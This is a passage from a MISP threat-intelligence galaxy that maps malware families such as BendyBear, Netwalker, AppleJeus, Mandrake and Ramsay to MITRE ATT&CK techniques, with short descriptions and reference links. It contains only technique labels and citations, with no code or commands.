uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5097. Table References
Links
https://attack.mitre.org/software/S0546
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

BendyBear - S0574

[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)

The tag is: misp-galaxy:mitre-malware="BendyBear - S0574"

BendyBear - S0574 is also known as:

BendyBear

View relationships graph

BendyBear - S0574 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 5098. Table References
Links
https://attack.mitre.org/software/S0574
https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/

BackConfig - S0475

[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)

The tag is: misp-galaxy:mitre-malware="BackConfig - S0475"

BackConfig - S0475 is also known as:

BackConfig

View relationships graph

BackConfig - S0475 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5099. Table References
Links
https://attack.mitre.org/software/S0475
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

DropBook - S0547

[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="DropBook - S0547"

DropBook - S0547 is also known as:

DropBook

View relationships graph

DropBook - S0547 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5100. Table References
Links
https://attack.mitre.org/software/S0547
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

Netwalker - S0457

[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)

The tag is: misp-galaxy:mitre-malware="Netwalker - S0457"

Netwalker - S0457 is also known as:

Netwalker

View relationships graph

Netwalker - S0457 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 5101. Table References
Links
https://attack.mitre.org/software/S0457
https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

AppleJeus - S0584

[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)

The tag is: misp-galaxy:mitre-malware="AppleJeus - S0584"

AppleJeus - S0584 is also known as:

AppleJeus

View relationships graph

AppleJeus - S0584 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 5102. Table References
Links
https://attack.mitre.org/software/S0584
https://us-cert.cisa.gov/ncas/alerts/aa21-048a

Mandrake - S0485

[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.

[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)

The tag is: misp-galaxy:mitre-malware="Mandrake - S0485"

Mandrake - S0485 is also known as:

Mandrake
oxide
briar
ricinus
darkmatter

View relationships graph

Mandrake - S0485 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 5103. Table References
Links
https://attack.mitre.org/software/S0485
https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf

Ramsay - S0458

[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)

The tag is: misp-galaxy:mitre-malware="Ramsay - S0458"

Ramsay - S0458 is also known as:

Ramsay

View relationships graph

Ramsay - S0458 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

Table 5104. Table References
Links
https://attack.mitre.org/software/S0458
https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/
https://www.programmersought.com/article/62493896999/

RDAT - S0495

[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)

The tag is: misp-galaxy:mitre-malware="RDAT - S0495"

RDAT - S0495 is also known as:

RDAT
RDAT

View relationships graph

RDAT - S0495 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 5105. Table References
Links
https://attack.mitre.org/software/S0495
https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

SilkBean - S0549

[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="SilkBean - S0549"

SilkBean - S0549 is also known as:

SilkBean

View relationships graph

SilkBean - S0549 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 5106. Table References
Links
https://attack.mitre.org/software/S0549
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

MechaFlounder - S0459

[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)

The tag is: misp-galaxy:mitre-malware="MechaFlounder - S0459"

MechaFlounder - S0459 is also known as:

MechaFlounder

View relationships graph

MechaFlounder - S0459 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 5107. Table References
Links
https://attack.mitre.org/software/S0459
https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

SpicyOmelette - S0646

[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)

The tag is: misp-galaxy:mitre-malware="SpicyOmelette - S0646"

SpicyOmelette - S0646 is also known as:

SpicyOmelette

View relationships graph

SpicyOmelette - S0646 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

Table 5108. Table References
Links
https://attack.mitre.org/software/S0646
https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

WindTail - S0466

